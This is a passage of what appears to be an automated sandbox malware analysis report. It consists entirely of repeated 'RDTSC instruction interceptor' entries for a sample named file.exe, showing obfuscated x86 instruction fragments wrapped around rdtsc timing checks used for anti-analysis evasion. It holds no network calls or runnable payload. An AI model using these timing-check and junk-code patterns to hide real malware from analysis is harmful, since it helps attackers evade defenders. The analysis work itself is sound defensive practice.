bl, BFh 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push ecx 0x0000005a jmp 00007F5B4C774D8Ah 0x0000005f pop ecx 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559DB4 second address: 559DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55AB16 second address: 55AB1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559DB8 second address: 559DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55AB1C second address: 55AB20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559DBC second address: 559DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559DC2 second address: 559DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55ACCE second address: 55ACD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BE76 second address: 55BE90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5B4C774D96h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55ACD4 second address: 55ACE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F5B4D24B716h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CB8F second address: 55CB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55EC82 second address: 55EC86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560E07 second address: 560E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edi 0x00000007 pushad 0x00000008 jmp 00007F5B4C774D90h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 pop edi 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F5B4C774D88h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c movsx edi, di 0x0000002f mov edi, 0FEA1C61h 0x00000034 push 00000000h 0x00000036 mov edi, 34C9EE3Fh 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebp 0x00000040 call 00007F5B4C774D88h 0x00000045 pop ebp 0x00000046 mov dword ptr [esp+04h], ebp 0x0000004a add dword ptr [esp+04h], 0000001Ch 0x00000052 inc ebp 0x00000053 push ebp 0x00000054 ret 0x00000055 pop ebp 0x00000056 ret 0x00000057 mov di, cx 0x0000005a xchg eax, esi 0x0000005b push ecx 0x0000005c push eax 0x0000005d push edx 0x0000005e jp 00007F5B4C774D86h 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560E87 second address: 560E95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561F1E second address: 561F28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5B4C774D86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561F28 second address: 561F36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561F36 second address: 561F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561F3D second address: 561F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CD63 second address: 55CD69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CD69 second address: 55CD6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CE28 second address: 55CE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5630C9 second address: 5630CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563F9C second address: 563FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5B4C774D8Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563FB0 second address: 563FB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564134 second address: 56413E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5B4C774D86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56413E second address: 564151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5B4D24B71Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56BD04 second address: 56BD0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B3CA second address: 56B415 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5B4D24B71Ch 0x00000008 push edi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F5B4D24B723h 0x00000010 pop edi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5B4D24B720h 0x0000001a pushad 0x0000001b jmp 00007F5B4D24B71Fh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B415 second address: 56B41A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B56D second address: 56B57F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5B4D24B716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F5B4D24B718h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B6E8 second address: 56B711 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5B4C774D8Ch 0x00000008 jnl 00007F5B4C774D86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 je 00007F5B4C774D8Eh 0x00000017 push eax 0x00000018 pop eax 0x00000019 jns 00007F5B4C774D86h 0x0000001f push eax 0x00000020 push edx 0x00000021 jbe 00007F5B4C774D86h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B711 second address: 56B715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B87C second address: 56B88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5B4C774D8Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B88B second address: 56B8AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B71Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5B4D24B71Ch 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B8AA second address: 56B8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F4AF second address: 56F4E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B71Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007F5B4D24B71Eh 0x00000010 push ecx 0x00000011 jp 00007F5B4D24B716h 0x00000017 pop ecx 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F5B4D24B71Bh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F4E1 second address: 56F4E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5754E1 second address: 5754EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5B4D24B71Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57579B second address: 5757A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 575EBE second address: 575EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576039 second address: 576047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5B4C774D86h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576047 second address: 576073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5B4D24B71Ch 0x0000000a jmp 00007F5B4D24B725h 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576073 second address: 576077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576077 second address: 57608C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B721h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57978D second address: 5797BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007F5B4C774D90h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551337 second address: 551393 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5B4D24B718h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F5B4D24B718h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 movsx edi, dx 0x0000002a or edx, dword ptr [ebp+122D2967h] 0x00000030 lea eax, dword ptr [ebp+124930A6h] 0x00000036 xor edi, dword ptr [ebp+12480E62h] 0x0000003c nop 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F5B4D24B724h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551393 second address: 551399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551399 second address: 5513B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F5B4D24B71Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5513B4 second address: 52C2A6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jne 00007F5B4C774D90h 0x0000000e call dword ptr [ebp+12456980h] 0x00000014 jo 00007F5B4C774DAAh 0x0000001a js 00007F5B4C774D8Eh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551481 second address: 551486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55188C second address: 551894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551B79 second address: 551B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5B4D24B716h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551BE9 second address: 551C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5B4C774D8Ch 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551C00 second address: 551C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551C06 second address: 551C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 xchg eax, esi 0x00000007 jmp 00007F5B4C774D8Bh 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F5B4C774D86h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551CCC second address: 551CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551E4B second address: 551E83 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F5B4C774D88h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov di, cx 0x00000026 push 00000004h 0x00000028 mov dword ptr [ebp+122D26EEh], edx 0x0000002e nop 0x0000002f push edi 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551E83 second address: 551E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551E87 second address: 551EB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 jns 00007F5B4C774D9Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F5B4C774D86h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551EB2 second address: 551EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5522A9 second address: 5522AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5522AF second address: 5522D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B727h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jbe 00007F5B4D24B71Eh 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552454 second address: 552459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55263B second address: 552675 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c push ecx 0x0000000d jno 00007F5B4D24B716h 0x00000013 pop ecx 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jmp 00007F5B4D24B71Bh 0x0000001e mov eax, dword ptr [eax] 0x00000020 pushad 0x00000021 jmp 00007F5B4D24B71Fh 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552675 second address: 552679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552679 second address: 55268E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F5B4D24B716h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55268E second address: 552698 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5B4C774D86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552698 second address: 5526AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5B4D24B722h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55274A second address: 55275C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5B4C774D86h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55275C second address: 552760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552760 second address: 552764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552764 second address: 5527C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F5B4D24B718h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 jns 00007F5B4D24B71Ch 0x00000028 lea eax, dword ptr [ebp+124930EAh] 0x0000002e sub edx, dword ptr [ebp+1247E5E7h] 0x00000034 nop 0x00000035 jmp 00007F5B4D24B720h 0x0000003a push eax 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5527C0 second address: 5527C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5527C4 second address: 52CEBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 lea eax, dword ptr [ebp+124930A6h] 0x0000000e stc 0x0000000f nop 0x00000010 jmp 00007F5B4D24B721h 0x00000015 push eax 0x00000016 push esi 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b pop esi 0x0000001c nop 0x0000001d or dword ptr [ebp+12467A8Ah], edx 0x00000023 call dword ptr [ebp+12452662h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e jmp 00007F5B4D24B721h 0x00000033 jmp 00007F5B4D24B726h 0x00000038 push edx 0x00000039 pop edx 0x0000003a popad 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52CEBD second address: 52CEDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D8Ah 0x00000007 push edx 0x00000008 jmp 00007F5B4C774D92h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 579BBF second address: 579BF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B722h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F5B4D24B727h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jne 00007F5B4D24B716h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A474 second address: 57A481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jo 00007F5B4C774D8Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A481 second address: 57A485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A485 second address: 57A48A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A48A second address: 57A49C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jne 00007F5B4D24B716h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EEEF second address: 57EF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F5B4C774D98h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EF0C second address: 57EF18 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5B4D24B71Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EF18 second address: 57EF26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EF26 second address: 57EF2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EF2C second address: 57EF39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F5B4C774D86h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F099 second address: 57F09D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F09D second address: 57F0BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5B4C774D8Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F5B4C774D86h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F0BA second address: 57F0EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B726h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5B4D24B728h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F0EC second address: 57F0F1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
